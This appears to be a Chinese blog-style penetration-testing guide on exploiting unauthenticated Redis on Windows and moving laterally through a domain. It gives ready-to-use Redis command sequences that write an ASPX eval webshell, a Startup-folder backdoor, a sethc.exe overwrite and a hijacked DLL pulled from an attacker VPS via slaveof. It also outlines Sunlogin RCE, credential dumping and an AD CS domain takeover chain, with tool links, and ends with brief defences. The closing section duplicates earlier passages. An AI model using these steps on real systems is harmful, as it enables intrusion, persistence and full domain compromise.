Redis未授权访问漏洞利用与内网渗透实战指南<\/h1>

一、Redis未授权访问漏洞概述<\/h2>
Redis未授权访问漏洞是指Redis服务在默认配置下未设置密码认证，导致攻击者可以直接连接到Redis服务并执行任意命令。这种漏洞在内网渗透中经常出现，危害极大。<\/p>

漏洞发现方法<\/h3>

使用端口扫描工具发现6379端口开放<\/li>
使用redis-cli直接连接测试：redis-cli -h <target_ip><\/code><\/li>

使用nmap脚本扫描：nmap -p 6379 --script redis-info <target_ip><\/code><\/li>
<\/ul>
二、Redis漏洞利用方法<\/h2>
1. Webshell写入<\/h3>
适用条件<\/strong>：<\/p>

存在IIS服务时可尝试写入C:\/inetpub\/wwwroot\/<\/code><\/li>
其他Web服务需要猜测目录<\/li>
Administrator权限可直接写，普通用户看运气，Network Service权限无法写入<\/li>
<\/ul>
操作步骤<\/strong>：<\/p>
config set dir "C:\/inetpub\/wwwroot\/"
config set dbfilename "shell.aspx"
set x "<%eval request("cmd")%>"
save
<\/code><\/pre>
2. 启动项写入<\/h3>
适用条件<\/strong>：<\/p>

Administrator权限可直接写<\/li>
普通用户需要猜用户名<\/li>
Network Service权限无法写入<\/li>
<\/ul>
操作步骤<\/strong>：<\/p>
config set dir "C:\/Users\/<username>\/AppData\/Roaming\/Microsoft\/Windows\/Start Menu\/Programs\/Startup\/"
config set dbfilename "backdoor.exe"
set x "<恶意exe内容>"
save
<\/code><\/pre>
3. 系统文件覆写<\/h3>
适用条件<\/strong>：<\/p>

需要System权限<\/li>
常用于RDP登录界面利用<\/li>
<\/ul>
操作步骤<\/strong>：<\/p>
config set dir "C:\/Windows\/System32\/"
config set dbfilename "sethc.exe"
set x "<cmd.exe内容>"
save
<\/code><\/pre>
4. DLL劫持利用（推荐方法）<\/h3>
4.1 原理概述<\/h4>
Redis在执行bgsave操作时会加载dbghelp.dll，如果应用目录中存在恶意dbghelp.dll，则会被优先加载执行。<\/p>
4.2 利用步骤<\/h4>
步骤1：生成恶意DLL<\/strong><\/p>

下载DLL劫持工具：https:\/\/github.com\/JKme\/sb_kiddie-\/blob\/master\/hacking_win\/dll_hijack\/DLLHijacker.py<\/li>
修改DllHijacker.py，指定目标DLL路径<\/li>
使用Visual Studio 2019生成项目文件<\/li>
修改项目属性（关键步骤）<\/li>
生成Release x64版本的DLL文件<\/li>
<\/ol>
步骤2：设置Redis主从复制<\/strong><\/p>

下载RabR工具：https:\/\/github.com\/0671\/RabR<\/li>
将生成的DLL文件放入RabR文件夹<\/li>
在VPS上运行RabR，开放对应端口<\/li>
<\/ol>
步骤3：执行主从复制<\/strong><\/p>
slaveof <vps_ip> <port>
config set dir "C:\/Program Files\/Redis\/"
config set dbfilename "dbghelp.dll"
save
<\/code><\/pre>
步骤4：触发DLL加载<\/strong>

执行bgsave<\/code>命令触发DLL加载<\/p>
三、内网渗透扩展<\/h2>
1. 内网信息收集<\/h3>

使用fscan扫描内网<\/li>
发现域环境：xiaorang.lab<\/li>
收集域内主机信息<\/li>
<\/ul>
2. 向日葵RCE漏洞利用<\/h3>
漏洞描述<\/strong>：

向日葵个人版 for Windows <= 11.0.0.33存在远程代码执行漏洞(CNVD-2022-10270)<\/p>
利用步骤<\/strong>：<\/p>

发现向日葵随机开放的web端口（40000以上）<\/li>
获取CID：访问\/cgi-bin\/rpc?action=verify-haras<\/code><\/li>
执行命令：使用sunlogin_rce工具（https:\/\/github.com\/Mr-xn\/sunlogin_rce）<\/li>
<\/ol>
3. 权限提升与横向移动<\/h3>

使用mimikatz抓取hash<\/li>
使用SharpHound收集域信息（需要System权限）<\/li>
使用PetitPotato提权<\/li>
上传后门程序到C:\Program Files\Redis<\/code><\/li>
<\/ul>
4. AD CS证书服务漏洞利用<\/h3>
漏洞描述<\/strong>：

AD CS允许请求任意DNS主机名的计算机证书，可模拟域控制器实现域接管。<\/p>
利用步骤<\/strong>：<\/p>


创建新机器账号<\/strong>：<\/p>

使用现有机器账号WIN-YUYAOX9Q$的hash<\/li>
创建新机器账号<\/li>
<\/ul>
<\/li>

申请证书模板<\/strong>：<\/p>
certreq -submit -attrib "CertificateTemplate:Machine" csr.req cert.cer
<\/code><\/pre>
<\/li>

Schannel利用<\/strong>：<\/p>

将pfx导出为.key和.crt文件<\/li>
使用PassTheCert工具（https:\/\/github.com\/AlmondOffSec\/PassTheCert）<\/li>
配置RBCD<\/li>
<\/ul>
<\/li>

获取域控权限<\/strong>：<\/p>

申请服务票据(ST)<\/li>
导入票据(PTT)<\/li>
无密码登录域控<\/li>
SAM转储获取hash<\/li>
Pass-the-Hash(PTH)攻击<\/li>
<\/ul>
<\/li>
<\/ol>
四、防御建议<\/h2>


Redis服务加固<\/strong>：<\/p>

设置强密码认证<\/li>
限制绑定IP<\/li>
禁用高危命令<\/li>
使用低权限账户运行<\/li>
<\/ul>
<\/li>

向日葵漏洞防御<\/strong>：<\/p>

升级到最新版本<\/li>
限制访问向日葵端口<\/li>
<\/ul>
<\/li>

AD CS防御<\/strong>：<\/p>

限制证书模板权限<\/li>
监控异常证书请求<\/li>
启用证书管理器审核<\/li>
<\/ul>
<\/li>

通用防御措施<\/strong>：<\/p>

定期更新补丁<\/li>
最小权限原则<\/li>
网络分段隔离<\/li>
启用日志审计<\/li>
<\/ul>
<\/li>
<\/ol>
五、工具清单<\/h2>


Redis利用工具：<\/p>

redis-cli<\/li>
RabR (https:\/\/github.com\/0671\/RabR)<\/li>
<\/ul>
<\/li>

DLL劫持工具：<\/p>

DLLHijacker (https:\/\/github.com\/JKme\/sb_kiddie-)<\/li>
<\/ul>
<\/li>

内网渗透工具：<\/p>

fscan<\/li>
mimikatz<\/li>
SharpHound<\/li>
PetitPotato<\/li>
<\/ul>
<\/li>

AD CS利用工具：<\/p>

PassTheCert (https:\/\/github.com\/AlmondOffSec\/PassTheCert)<\/li>
<\/ul>
<\/li>

向日葵RCE工具：<\/p>

sunlogin_rce (https:\/\/github.com\/Mr-xn\/sunlogin_rce)<\/li>
<\/ul>
<\/li>
<\/ol>

Redis未授权访问漏洞利用与内网渗透实战指南<\/h1>

一、Redis未授权访问漏洞概述<\/h2> Redis未授权访问漏洞是指Redis服务在默认配置下未设置密码认证，导致攻击者可以直接连接到Redis服务并执行任意命令。这种漏洞在内网渗透中经常出现，危害极大。<\/p>

二、Redis漏洞利用方法<\/h2>

4. DLL劫持利用（推荐方法）<\/h3>

4.1 原理概述<\/h4> Redis在执行bgsave操作时会加载dbghelp.dll，如果应用目录中存在恶意dbghelp.dll，则会被优先加载执行。<\/p>

一、Redis未授权访问漏洞概述<\/h2>
Redis未授权访问漏洞是指Redis服务在默认配置下未设置密码认证，导致攻击者可以直接连接到Redis服务并执行任意命令。这种漏洞在内网渗透中经常出现，危害极大。<\/p>

4.1 原理概述<\/h4>
Redis在执行bgsave操作时会加载dbghelp.dll，如果应用目录中存在恶意dbghelp.dll，则会被优先加载执行。<\/p>